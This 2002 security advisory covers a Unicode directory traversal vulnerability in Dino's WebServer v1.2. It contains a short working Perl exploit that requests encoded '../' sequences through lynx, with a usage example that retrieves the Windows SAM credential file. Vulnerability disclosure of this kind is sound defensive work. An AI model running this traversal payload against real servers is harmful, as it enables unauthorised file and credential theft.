SecurityOffice

Dino's WebServer v1.2 Unicode Directory Traversal Vulnerability

Type

File Disclosure

Release Date

August 10, 2002

Product / Vendor

Dino's Webserver is a small and very simple to use web server that is intended to allow you to setup a quick and basic web server to serve a home page from your local computer. It includes a log function as well as a simple web hit counter with different design styles to choose from. All it requires is the IP adress of your machine, the web directory and port to use. The program is intended for casual home usage only.

Summary

Due to a vulnerability in Dino's web server v1.2, it is possible to bypass the URL security check and manipulate files on the remote host. In this attack we will exploit this vulnerability and then use it to download any file a remote machine. This would potentially enable a malicious user who visited the web site to gain private files and information on the machine.

This exploit works by an attacker constructing a URL that would cause Dino's web server to navigate to any desired folder in the same logical drive and access the files in it. This can be achieved by using the Unicode character representations of "/" and "\". This allows a user to traverse the server to any directory on the same logical drive as the web application. In addition to this, unauthenticated users can perform the following get in these directories.

Exploit

==================== SNIP ====================

#!/usr/bin/perl -w

die "\nDino's Webserver Unicode Directory Traversal / SecurityOffice\n\nUsage: $0 <host> <directory> <file> / Example: $0 www.target.com /winnt/repair/ sam\n\n" if $#ARGV <2;

print &get($ARGV[0], $ARGV[1], $ARGV[2]);

exit 0;

sub get {

$host = $ARGV[0];

$directory = $ARGV[1];

$file = $ARGV[2];

system "lynx $host/%2f..%2f..%2f..$directory$file";

print "File $file Download Completed!\n\n";

}

==================== SNIP ====================

Tested

Windows 2000 / Dino's web server v1.2

Vulnerable

Dino's web server v1.2 (And may be other.)

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net